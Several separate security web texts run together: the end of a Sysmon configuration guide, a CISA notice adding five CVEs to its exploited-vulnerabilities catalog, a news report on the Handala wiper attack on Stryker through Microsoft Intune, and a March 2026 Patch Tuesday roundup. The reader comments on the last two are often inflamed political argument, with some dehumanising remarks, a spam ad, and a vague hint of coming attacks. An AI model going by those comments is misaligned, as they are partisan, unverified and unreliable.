sysmon64.exe -c sysmon-config.xml Check current configuration: sysmon64.exe -c Log Location Sysmon events appear in: Applications and Services Logs → Microsoft → Windows → Sysmon → Operational Log Size Configuration Default log size is typically too small. Increase it: wevtutil sl "Microsoft-Windows-Sysmon/Operational" /ms:524288000 Or via GPO: Computer Configuration → Administrative Templates → Windows Components → Event Log Service → Sysmon → Specify maximum log file size: 512000 KB Configuration Tuning Philosophy The configuration I provided is a starting point. I took the effort to ensure that the config would serve as a starting point for workstation and server alike. As you tune the config, ensure that you tune one for workstation and one for server. Once this is done, depending on the roles for servers and who uses the workstations, you can tune even further. Start slow and test. You need to tune it for your environment. Here's my approach: - Start noisy, filter down: Enable more than you need initially. See what generates volume. Add exclusions for verified benign activity. - Threat model drives filtering: What attacks are you most concerned about? Adjust your filters accordingly. If you're worried about insider threats, you might want more coverage. If you're focused on commodity malware, you can be more aggressive with exclusions. - Baseline before excluding: This is especially important for named pipes but applies broadly. Understand what's normal in your environment before you start filtering. Otherwise, you risk excluding something an attacker is abusing. - Test before deploying: Deploy to a test group first. Measure log volume and system impact. Adjust before rolling out widely. - Iterate continuously: Your environment changes. So do attacker techniques. Review and update your configuration quarterly, at minimum. - Use community resources: The [TrustedSec Sysmon Community Guide](https://github.com/trustedsec/SysmonCommunityGuide)goes deep on each event type with practical configuration guidance. We cover strategies for named pipes, network connections, registry monitoring, and more. It's worth reading through before finalizing your configuration. If you prefer video content, we also have a [Sysmon YouTube series](https://www.youtube.com/playlist?list=PLk-dPXV5k8SG26OTeiiF3EIEoK4ignai7) that walks through configuration concepts and practical deployment scenarios. Sysmon Alternatives and Companions I want to be transparent—Sysmon isn't the only option. Some alternatives: - Velociraptor – Open-source DFIR tool with endpoint visibility - osquery – SQL-based endpoint telemetry - EDR-native capabilities – Many EDRs provide similar telemetry (but that's our single-source problem) The advantage of Sysmon is that it's free, it's from Microsoft (so no third-party driver concerns), and the logs go to the standard Windows Event Log infrastructure. What We've Built So Far Across Parts 1-4 of this blog series, we've established: [Part 2 - Windows Security Events:](https://trustedsec.com/blog/building-a-detection-foundation-part-2-windows-security-events) - Logon/Logoff for session tracking - Process Creation (4688) with command lines - Service installation - Scheduled tasks - Script Block Logging (4104) for deobfuscated scripts - Module Logging (4103) for command execution - Transcription for full session recording Part 4 - Sysmon: - Enhanced process creation with hashes - Network connections by process - Registry modifications - File creation - Driver and DLL loading - Named pipe activity - WMI events - DNS queries In Part 5, we'll bring it all together—correlating across these sources during investigations and building detections that leverage the full foundation. Resources for Going Deeper [TrustedSec Sysmon Community Guide](https://github.com/trustedsec/SysmonCommunityGuide)– Comprehensive documentation on each Sysmon event type with configuration strategies and examples[Sysmon Video Series](https://www.youtube.com/playlist?list=PLk-dPXV5k8SG26OTeiiF3EIEoK4ignai7)– Video walkthroughs covering deployment, configuration, and practical use cases[Microsoft Sysmon Documentation](https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon)– Official documentation and download

CISA Adds Five Known Exploited Vulnerabilities to Catalog CISA has added five new vulnerabilities to its [Known Exploited Vulnerabilities (KEV) Catalog](/known-exploited-vulnerabilities-catalog), based on evidence of active exploitation. [CVE-2025-31277](https://www.cve.org/CVERecord?id=CVE-2025-31277)Apple Multiple Products Buffer Overflow Vulnerability[CVE-2025-32432](https://www.cve.org/CVERecord?id=CVE-2025-32432)Craft CMS Code Injection Vulnerability[CVE-2025-43510](https://www.cve.org/CVERecord?id=CVE-2025-43510)Apple Multiple Products Improper Locking Vulnerability[CVE-2025-43520](https://www.cve.org/CVERecord?id=CVE-2025-43520)Apple Multiple Products Classic Buffer Overflow Vulnerability[CVE-2025-54068](https://www.cve.org/CVERecord?id=CVE-2025-54068)Laravel Livewire Code Injection Vulnerability These types of vulnerabilities are frequent attack vectors for malicious cyber actors and pose significant risks to the federal enterprise. [Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities](/binding-operational-directive-22-01) established the KEV Catalog as a living list of known Common Vulnerabilities and Exposures (CVEs) that carry significant risk to the federal enterprise. BOD 22-01 requires Federal Civilian Executive Branch (FCEB) agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the [BOD 22-01 Fact Sheet](/sites/default/files/publications/Reducing_the_Significant_Risk_of_Known_Exploited_Vulnerabilities_211103.pdf) for more information. Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of [KEV Catalog vulnerabilities](/known-exploited-vulnerabilities-catalog) as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the catalog that meet the [specified criteria](/known-exploited-vulnerabilities). This product is provided subject to this [Notification](/notification) and this [Privacy & Use](/privacy-policy) policy.

A hacktivist group with links to Iran’s intelligence agencies is claiming responsibility for a data-wiping attack against Stryker, a global medical technology company based in Michigan. News reports out of Ireland, Stryker’s largest hub outside of the United States, said the company sent home more than 5,000 workers there today. Meanwhile, a voicemail message at Stryker’s main U.S. headquarters says the company is currently experiencing a building emergency. Based in Kalamazoo, Michigan, Stryker [NYSE:SYK] is a medical and surgical equipment maker that reported $25 billion in global sales last year. In a lengthy statement posted to Telegram, a hacktivist group known as Handala (a.k.a. Handala Hack Team) claimed that Stryker’s offices in 79 countries have been forced to shut down after the group erased data from more than 200,000 systems, servers and mobile devices. “All the acquired data is now in the hands of the free people of the world, ready to be used for the true advancement of humanity and the exposure of injustice and corruption,” a portion of the Handala statement reads. The group said the wiper attack was in retaliation for a Feb. 28 missile strike that hit an Iranian school and killed at least 175 people, most of them children. The New York Times [reports](https://www.nytimes.com/2026/03/11/us/politics/iran-school-missile-strike.html) today that an ongoing military investigation has determined the United States is responsible for the deadly Tomahawk missile strike. Handala was one of several hacker groups recently [profiled](https://unit42.paloaltonetworks.com/iranian-cyberattacks-2026/) by Palo Alto Networks, which links it to Iran’s Ministry of Intelligence and Security (MOIS). Palo Alto says Handala surfaced in late 2023 and is assessed as one of several online personas maintained by [Void Manticore](https://malpedia.caad.fkie.fraunhofer.de/actor/void_manticore), a MOIS-affiliated actor. Stryker’s website says the company has 56,000 employees in 61 countries. A phone call placed Wednesday morning to the media line at Stryker’s Michigan headquarters sent this author to a voicemail message that stated, “We are currently experiencing a building emergency. Please try your call again later.” A [report](https://www.irishexaminer.com/news/munster/arid-41808308.html) Wednesday morning from the Irish Examiner said Stryker staff are now communicating via WhatsApp for any updates on when they can return to work. The story quoted an unnamed employee saying anything connected to the network is down, and that “anyone with Microsoft Outlook on their personal phones had their devices wiped.” “Multiple sources have said that systems in the Cork headquarters have been ‘shut down’ and that Stryker devices held by employees have been wiped out,” the Examiner reported. “The login pages coming up on these devices have been defaced with the Handala logo.” Wiper attacks usually involve malicious software designed to overwrite any existing data on infected devices. But a trusted source with knowledge of the attack who spoke on condition of anonymity told KrebsOnSecurity the perpetrators in this case appear to have used a Microsoft service called Microsoft Intune to issue a ‘remote wipe’ command against all connected devices. Intune is a cloud-based solution built for IT teams to enforce security and data compliance policies, and it provides a single, web-based administrative console to monitor and control devices regardless of location. The Intune connection is supported by [this Reddit discussion](https://www.reddit.com/r/cybersecurity/comments/1rqopq0/stryker_hit_by_handala_intune_managed_devices/) on the Stryker outage, where several users who claimed to be Stryker employees said they were told to uninstall Intune urgently. Palo Alto says Handala’s hack-and-leak activity is primarily focused on Israel, with occasional targeting outside that scope when it serves a specific agenda. The security firm said Handala also has taken credit for recent attacks against fuel systems in Jordan and an Israeli energy exploration company. “Recent observed activities are opportunistic and ‘quick and dirty,’ with a noticeable focus on supply-chain footholds (e.g., IT/service providers) to reach downstream victims, followed by ‘proof’ posts to amplify credibility and intimidate targets,” Palo Alto researchers wrote. The Handala manifesto posted to Telegram referred to Stryker as a “Zionist-rooted corporation,” which may be a reference to the company’s 2019 acquisition of the Israeli company OrthoSpace. Stryker is a major supplier of medical devices, and the ongoing attack is already affecting healthcare providers. One healthcare professional at a major university medical system in the United States told KrebsOnSecurity they are currently unable to order surgical supplies that they normally source through Stryker. “This is a real-world supply chain attack,” the expert said, who asked to remain anonymous because they were not authorized to speak to the press. “Pretty much every hospital in the U.S. that performs surgeries uses their supplies.” John Riggi, national advisor for the American Hospital Association (AHA), said the AHA is not aware of any supply-chain disruptions as of yet. “We are aware of reports of the cyber attack against Stryker and are actively exchanging information with the hospital field and the federal government to understand the nature of the threat and assess any impact to hospital operations,” Riggi said in an email. “As of this time, we are not aware of any direct impacts or disruptions to U.S. hospitals as a result of this attack. That may change as hospitals evaluate services, technology and supply chain related to Stryker and if the duration of the attack extends.” According to a March 11 memo from the state of Maryland’s Institute for Emergency Medical Services Systems, Stryker indicated that some of their computer systems have been impacted by a “global network disruption.” The memo indicates that in response to the attack, a number of hospitals have opted to disconnect from Stryker’s various online services, including LifeNet, which allows paramedics to transmit EKGs to emergency physicians so that heart attack patients can expedite their treatment when they arrive at the hospital. “As a precaution, some hospitals have temporarily suspended their connection to Stryker systems, including LIFENET, while others have maintained the connection,” wrote Timothy Chizmar, the state’s EMS medical director. “The Maryland Medical Protocols for EMS requires ECG transmission for patients with acute coronary syndrome (or STEMI). However, if you are unable to transmit a 12 Lead ECG to a receiving hospital, you should initiate radio consultation and describe the findings on the ECG.” This is a developing story. Updates will be noted with a timestamp. Update, 2:54 p.m. ET: Added comment from Riggi and perspectives on this attack’s potential to turn into a supply-chain problem for the healthcare system. Update, Mar. 12, 7:59 a.m. ET: Added information about the outage affecting Stryker’s online services. If medical device companies are “fair game”, are drug manufacturers and hospitals next? No honor among thieves?? Israel quite literally flattened most hospitals in Gaza strip. You think they won’t do the same in Iran? What a ridiculous claim. Hamas was using hospitals as command centers, Israel did not attack the Minab school Just more excuses for terrorism and extortion. Bellingcat confirms it was a US Tomahawk, something that Israel does not possess. Yes, I frequently store my ammo next to an MRI machine. Oh look.A brainwashed zio.Israle BOMBED HOSPITALS SCHOOL MOSQES AND AID SITES.Please have several thousand seats Well, people voted for Hamas in the last elections held and they knew what they’re buying. So sit down son and enjoy the FO part of FAFO. BIbi gave money to Hamas and undermined the PA. Read better child. That doesn’t make bombing schools, hospitals etc any less of a war crime. There is no justification for Israeli genocidal tactics and disregard of laws. Pointing this out is not supporting Hamas either. seeing truth is not the same as being brainwashed there are no good bombs and bad bombs dehumanization of people is typical brainwash agenda why kids in Ukraine or Gaza are worse than other kids they are if your set of rules are from hell Couldn’t agree more. The US killed 175 mostly children. Was that fair game? LOL put all your security on the cloud…. “Microsoft service called Microsoft Intune to issue a ‘remote wipe’ command against all connected devices.” Every vendor that has moved to a cloud based console has been compromised Personally we quit using every security vendor that has moved to a cloud based console, If I can access it on the web, so can someone else I will stick will old school VPN and inside network please…… people with VPN on their devices were wiped, and you have it wrong. Being connected to a cloud does not make you vulnerable, being connected to any network (even “inside”) does… good luck out there They’re talking about using SaaS cloud consoles that directly control their entire device fleet, as opposed to only site-accessible compartmentalized consoles behind a specific private self-run VPN. That is actually not wrong, that’s absolutely the smarter play if less convenient and potentially overlook-able unless IT stays on toes. Calling a person a clown off the bat online because you haven’t even considered fully what they’re saying is pretty juvenile IMO, but we all have to grow up sometime I guess. It’s never as simple as **cloud bad!** I’ve been in situations where similar wipe threats happened entirely “inside network”. The root-cause analysis usually points to at least two larger procedural issues: * Errors that are not caught, causing operations to continue when they should have been stopped * Operations that happen at scale without human oversight/approval This company of 50k+ employees (or, maybe worse, the garbage Microsoft software they used and is used by *many* other organizations) had a way to blow away their entire IT infrastructure? That’s bonkers! Something right out of SpaceBalls: “Thank you for pressing the self destruct button.” Thank you Ronald. I’ve been concerned about this from the start of “cloud” services. The company I was at got on that train. I think everyone for the most part has. It is just too much exposure. I sent one of their recruiters a resume and an offer to help on LI 😉 I see all those funding cuts for national cybersecurity are working out… The US brought back 4 avenger-class minesweepers from the mideast, they arrived in Philadelphia the same day Iran started mining the strait. If this isn’t the smartest and most deeply thought-out administration in American history, it’s certainly the one with the most brightly colored hats. Yeah, because those ships are THIRTY YEARS OLD and we already have replacements that are ALREADY ACTIVE in the straight of hormuz called Littoral Combat Ships. For all the budget discussion around them, their entire mission set was designed around defense in littoral waters, such as the Strait of Hormuz. Your comment simply does not make sense to anyone actively monitoring the situation. Not going to age well that comment….crude carriers sail in the deep waters…which is what this is all about! Remember it’s not the physical space which needs to be cleared of mines…it’s the mindset of the insurance market…welcome to asymmetrical warfare 🙂 Littoral ships have no problems operating in deep water. They are not designed to engage true deep water navy ships in combat is all, ie they can’t hold deep water by themselves against a real navy. For that there is the rest of the US navy and navy airforce, and they have already sunk most of the Iranian navy. The main danger isn’t mines, ie to set a proper minefield that would requires a proper minesweep to clear, requires a minelaying ship to sail uncontested through the area. For what can be placed now, the remote mine removing submersible that the littoral ships can bring is sufficient. The current danger from Iran is not navy ships, its fast attack boats, and sea drones which have similar performance to fast attack boats. The avengers have .50cal machine guns which are only intended for defensive purposes. Equivalent soviet 12.7mm guns in the russian black sea fleet has proven very unreliable at defeating Ukrainian sea drones. At best all they have done is occasionally protect the vessel they are floating on, and can do nothing about drones targeting other vessels. What the littoral ships have is a 57mm automatic bofors, in an unmanned, fully stabilized, computer controlled radar guided mount. Which is probably the best solution to asymmetric drone and boat style naval warfare currently available. Littoral combat ships have been marred by serious engine defects, shortened replenishment schedules and have no history of achieving anything significant in any theater yet. They’re expensive comparatively for what they are and have no track record of volume success in de-mining anything at all, anywhere. They may be theoretically capable to do that but it’s certainly not going to be as effective as a purpose-built minesweeper FLEET of smaller vessels in coordination that already existed there. Mines can be laid in an afternoon to meet your description of ‘proper’ minefield that would take _months_ to remove. LCS have never been tested against significant drone attacks, and as capable (theoretically) as Bofors guns might be against such threats attacking the ship _itself_ they’re next to useless for theater protection. Certainly a sufficiently sized swarm of inexpensive drones would be expected to achieve hits against a much, much more expensive ad hoc minesweeper role. It’s a jack of trades and an expensive one that’s never been tested, lest of all significantly damaged or having achieved a significant objective requiring ASAP minesweeping. Having so few of them as we do increases the chance that one being damaged or disabled would severely compromise the minesweeping role in theater. The longer the strait remains closed, the more incompetent the administration looks as the western economies all share the burdens. LCS isn’t going to dent that outcome if Iran successfully mines it. The T-64 began its design process circa late 1950s, T-64A entered service circa 1967 and its first combat engagement was 1992. ie if you don’t fight a war, your gear doesn’t get “proven”. This is the opportunity that will allow littoral ships to prove useful or not. At this point in time, actual estimates of mines laid vary between 10 and 0, and estimates of sunken known minelaying ships to be something like 14. The resources required to enforce a fully closed strait doesn’t exist, its just a passage that is currently too risky for commercial insurance. The US has more than one integrated MCM platform, including helicopter and remote submersible based systems, none of which hard require either littorals or avengers to be present. The main threat is not mines, its speed boat based drones and actual projectiles including actual antiship missiles. All an avenger can do against those threats is float there and take hits, casualties and sink. I would not expect that swarming sea drones is an easy task, nor are they particularly cheap and I would also expect that such a swarm would be visible being prepared on the coast, which would invite all sorts of counters, not limited to aircraft or missiles/shellfire from the navy. Launching individual sea drones stealthily is much more feasible, which is why the attack pattern looks like it does, most at the bend, but some all up and down the iranian coast. It’s the worst test case scenario for finding out if your kit is up to task or not. yahoo.com/news/articles/u-navy-minesweepers-assigned-middle-210524347.html They still float, weren’t rusting to death, and were capable minesweeping craft in-theater as opposed to whatever they’re hastily bringing in RN to replace them, after the fact, because Trump apparently didn’t consider the ramifications of the Strait of Hormuz before he set it on fire at Bibi’s beckon. Littoral combat ships have never been proven minesweepers at volume in an active theater scenario. Avenger class vessels are exactly that, and already there. Making the point about the mindless timing of their withdrawal from theater RIGHT AS THEY BECOME CRUCIAL ASSETS because of a decision to go to war (of choice) should be obvious to most, but I’ll cede that you sure don’t seem to get it. Littoral ships are also riddled with shakedown issues and are vastly more expensive than projected, so your particular points of choice to try to explain away this tactical blunder in a war (of choice) rife with strategic blunders as far as the eye can see are pretty evenly self-blunted. Bravo sir, you could be Trump’s next Secretary of Doing War Badly, you’ve got the posturing down pat. The littoral ships have been around for quite a while now, in the class that had the gearbox issue, that has been fixed, and the early hulls which would have been difficult to bring up to standard are in reserve. As I said in my other post, there isn’t a volume demining problem at this point in time. The fact that too much was spent on procurement is a general US procurement issue, its not an active service issue. IMO no military can ever guess what its dimwit political leadership will do and at some point the equipment has to be modernized and changeovers have to occur. They’ve been having their engines fail with seawater in oil for a while now, among other failures you’re trying to rose-color over. The math remains unchanged. They pulled minesweepers out of the theater right as they might have become crucially integral to the “plan” that has nothing to do with strategic thought. What would Iran have to gain from mining the Strait? As it stands, they already have the capability to attack any ships passing through the Strait as seen with the Thai ships this past week. Additionally, their biggest trade partner, China, uses the Strait, so WHY would they mine it and risk their biggest leverage in this conflict? The backing of China, and control of this Strait is the biggest leverage Iran has. Also, this administration is run by a bunch of p*dophiles protecting other p*dophiles, it will go down as the most shameful in modern American history. They would have the ability to close the strait without effort to any traffic besides their own. The fear of mines is almost as great a threat to shipping as un-passable mines themselves. The ships that are passing through are all Iranian-permitted – Think about that for a quick second before you reply. They know where they mine, they know where mines are, and others do not. That’s what you’re apparently misunderstanding about the threat. Also China apparently hedged oil bets ahead of this conflict and is in no big hurry to force reopening, they aren’t hurting particularly. They are the least affected and any Iranian effort to disrupt the western-backed economies benefits their interests. Mines can be later removed by the country that places them at any time at all. Removal by others takes a serious effort. It’s something that’s been known for decades already by everyone except apparently Donald Trump, mastermind military strategic genius that he claims to be. Ah! Now I understand what all those weird requests from IR domains were. And to think, we are just getting started. It’s going to be a fun March, with the Ides coming up and Microsoft in some areas an already open book… Thanks for the post and my group also thanks you, one team one goal. PleaseJustFixIT.org #HealthSupport #OneTeam Karma is a b. Stryker has been getting business unethically for years. Made my day. Love this comment !!! So true. How have they been doing business unethically? I’m not disagreeing. I genuinely do not know Ah, what was Stryker’s MS Secure Score? Everyone with an MS 365 tenant should be concerned and hoping they didn’t miss the same control that Stryker did. It’s unlikely Stryker will release their own Secure Score to the public, but it seems like the Stryker breach occurred due to privilege escalation due to a lack of governance controls. MS 365 users should probably be fine as long as they’re keeping an eye on their device management. Its likely that Stryker’s breach was likely due to their own fault since the breach occurred probably to a phishing attack or something that obtained an admins credentials. Microsoft 365 was not the vulnerability issue. Let’s not forget this story wouldn’t have been written if the orange one hadn’t started a war with Iran. But wait, wasn’t he supposed to be ‘The President of peace’, ‘I will focus on America’, ‘If I’m not elected, Kamala will start wars all over the world’. He’s showing his enjoyment of watching people die and inflicting suffering. And how can ANYONE believe this will end well considering he bankrupted 3 casinos. This is just the beginning of the pain the world will experience because of the actions of someone mentally ill who should be in a nursing home and not POTUS. I like turtles I also like turtles. George died in 2009. Clearly the person this is about has been soulless since 2002/2003. I think that turtles are fortunate to have a hard shell to protect them. Their domes are way better and cooler than any of our protective domes. Pity that we have to work to protect their breeding sites. Finding it harder and harder to not want to decimate and dismantle Israel’s ‘cybersecurity’ “program” my own self. “A source familiar with the attack told BleepingComputer that the threat actor used the wipe command in Intune, Microsoft’s cloud-based endpoint management service, to erase data from nearly 80,000 devices between 5:00 and 8:00 a.m. UTC on March 11” https://www.bleepingcomputer.com/news/security/stryker-attack-wiped-tens-of-thousands-of-devices-no-malware-needed/ This article about bot control issues is a sobering reminder why automated systems need proper safeguards – especially in funded accounts where you’re operating under strict drawdown rules. I learned the hard way that one poorly-configured EA can blow a challenge, so I switched to Ratio X Toolbox which gives you multiple bots for different market regimes instead of relying on a single system that can malfunction. The stress testing features actually helped me understand my max daily loss limits before hitting real money. Have you found that diversifying across different EA types helps you survive the drawdown phases of prop firm challenges? Hey, howza boutta plug for some crap product and some totally non-profound ‘coded’ language. We need more tension, poorly done feints, and discussions of clipper ships. Otherwise, we are not fully populating the cyber-landscape with fully-featured, complex threat actors. my sec+ training says this is nation/state sponsored. not hacktivist. This attack shows the security vulnerability and the sophistication of Iran hacking attack. It only works when I’m Nepal. It seems to work fine in Brampton or any other VPN people think they all live in I personally am voting for ‘strips you can wind there’, though you need that nonexistent time machine for that movie, too. AI is the baby. Hail Satan! Welcome to a brand new day, Revelations Jayna!

Microsoft Corp. today pushed security updates to fix at least 77 vulnerabilities in its Windows operating systems and other software. There are no pressing “zero-day” flaws this month (compared to February’s five zero-day treat), but as usual some patches may deserve more rapid attention from organizations using Windows. Here are a few highlights from this month’s Patch Tuesday. Two of the bugs Microsoft patched today were publicly disclosed previously. [CVE-2026-21262](https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-21262) is a weakness that allows an attacker to elevate their privileges on SQL Server 2016 and later editions. “This isn’t just any elevation of privilege vulnerability, either; the advisory notes that an authorized attacker can elevate privileges to sysadmin over a network,” Rapid7’s Adam Barnett said. “The CVSS v3 base score of 8.8 is just below the threshold for critical severity, since low-level privileges are required. It would be a courageous defender who shrugged and deferred the patches for this one.” The other publicly disclosed flaw is [CVE-2026-26127](https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-26127), a vulnerability in applications running on .NET. Barnett said the immediate impact of exploitation is likely limited to denial of service by triggering a crash, with the potential for other types of attacks during a service reboot. It would hardly be a proper Patch Tuesday without at least one critical Microsoft Office exploit, and this month doesn’t disappoint. [CVE-2026-26113](https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-26113) and [CVE-2026-26110](https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-26110) are both remote code execution flaws that can be triggered just by viewing a booby-trapped message in the Preview Pane. Satnam Narang at Tenable notes that just over half (55%) of all Patch Tuesday CVEs this month are privilege escalation bugs, and of those, a half dozen were rated “exploitation more likely” — across Windows Graphics Component, Windows Accessibility Infrastructure, Windows Kernel, Windows SMB Server and Winlogon. These include: –[CVE-2026-24291](https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-24291): Incorrect permission assignments within the Windows Accessibility Infrastructure to reach SYSTEM (CVSS 7.8) –[CVE-2026-24294](https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-24294): Improper authentication in the core SMB component (CVSS 7.8) –[CVE-2026-24289](https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-24289): High-severity memory corruption and race condition flaw (CVSS 7.8) –[CVE-2026-25187](https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-25187): Winlogon process weakness discovered by Google Project Zero (CVSS 7.8). Ben McCarthy, lead cyber security engineer at Immersive, called attention to [CVE-2026-21536](https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-21536), a critical remote code execution bug in a component called the Microsoft Devices Pricing Program. Microsoft has already resolved the issue on their end, and fixing it requires no action on the part of Windows users. But McCarthy says it’s notable as one of the first vulnerabilities identified by an AI agent and officially recognized with a CVE attributed to the Windows operating system. It was discovered by XBOW, a fully autonomous AI penetration testing agent. XBOW has consistently ranked at or near the top of the Hacker One bug bounty leaderboard for the past year. McCarthy said CVE-2026-21536 demonstrates how AI agents can identify critical 9.8-rated vulnerabilities without access to source code. “Although Microsoft has already patched and mitigated the vulnerability, it highlights a shift toward AI-driven discovery of complex vulnerabilities at increasing speed,” McCarthy said. “This development suggests AI-assisted vulnerability research will play a growing role in the security landscape.” Microsoft earlier provided patches to address nine browser vulnerabilities, which are not included in the Patch Tuesday count above. In addition, Microsoft issued a crucial out-of-band (emergency) [update on March 2](https://support.microsoft.com/en-us/topic/march-2-2026-kb5082314-os-build-20348-4776-out-of-band-606518e5-28d2-4ebe-be25-26287e2fc703) for Windows Server 2022 to address a certificate renewal issue with passwordless authentication technology Windows Hello for Business. Separately, Adobe shipped updates to fix 80 vulnerabilities — some of them critical in severity — in [a variety of products](https://helpx.adobe.com/security/Home.html), including Acrobat and Adobe Commerce. Mozilla Firefox v. 148.0.2 resolves three high severity CVEs. For a complete breakdown of all the patches Microsoft released today, check out the SANS Internet Storm Center’s [Patch Tuesday post](https://isc.sans.edu/forums/diary/Microsoft%20Patch%20Tuesday%20March%202026/32782/). Windows enterprise admins who wish to stay abreast of any news about problematic updates, [AskWoody.com](https://www.askwoody.com) is always worth a visit. Please feel free to drop a comment below if you experience any issues apply this month’s patches. Contrary to this article, updates this month contain fixes for at least two publicly acknowledged zero days. Really? Which two? IDK how you define zero-day, but for me it’s an unpatched and actively exploited vulnerability. As mentioned in the story, there were two flaws fixed this month that were previously disclosed publicly. I believe in both cases there was not even sample exploit code involved. I’m just going off every other news outlet reporting. Bleeping computer, for example, stated “This month’s Patch Tuesday fixes two publicly disclosed zero-day vulnerabilities, with none of them known to be exploited in attacks. Microsoft classifies a zero-day flaw as publicly disclosed or actively exploited while no official fix is available.” ¯\_(ツ)_/¯ Okay. Thanks for pointing that out. I wonder why Microsoft would call it zero-day when they’re not aware of exploitation; doesn’t seem to suit their interests to do so. I’ve always believed that calling bugs 0day just because someone detailed a vulnerability (without providing examples of how to exploit them) publicly is unnecessarily alarmist. Real zero-days are a call for greater urgency, IMHO. I think Microsoft likes to call them zero day when they feel the exploit is available even though nobody is currently using it. But then again maybe Microsoft knows something nobody else does? Is it one of those deals where it depends on who is releasing these security descriptors for the updates? One person calls them zero day the other something less dire? I saw the Bleeping Computer release too. They said the 2 zero-day ones were publicly disclosed. Not actively exploited. I guess sort of splitting hairs there. That sounds pretty accurate. I think “zero-day” is defined and communicated differently throughout different organizations. Technically, a zero-day is any vulnerability that was unknown to the vendor before it became public. That doesn’t necessarily mean it’s being actively exploited. Microsoft uses “zero-day” as a broad label, then clarifies whether it’s actively exploited or just publicly disclosed. Other sources, like BleepingComputer, tend to separate those more clearly, which can make things less confusing. A publicly disclosed zero-day increases risk, but an actively exploited one is far more urgent since attackers are already using it in real-world attacks. I don’t know if they know what they’re talking about, but Lifehacker reported there are two: https://lifehacker.com/tech/microsoft-patch-tuesday-march-2026#:~:text=Two%20publicly%20disclosed%20zero%2Ddays%20for%20this%20Patch%20Tuesday Looking for a patch for the chicken parm with panko and tagliatelle exploit. It’s two cascaded exploits, both leading to escalation followed by a ring three rk installation. 2021-2023/early 2024. Originating attacker from Ramat Gan. Gnarly beach. I had the same discussion with my coworker, who used CoPilot to summarize and the previously disclosed findings were included in the response because the patch is included in this month’s bundle. Strictly speaking anything previously published is no longer a “zero day” as far as I know, but it’s genesis stays with it. I mean, any bug, prior to being disclosed, is at some point a ‘zero-day’ bug. AFAIK, it ceases being an 0-day the minute it is disclosed, yah? Have they heard about two-factor authentication? They were obviously phished. Maybe put TFA in place now. Lol at the roughy in your article! You criminal mastermind, Keir!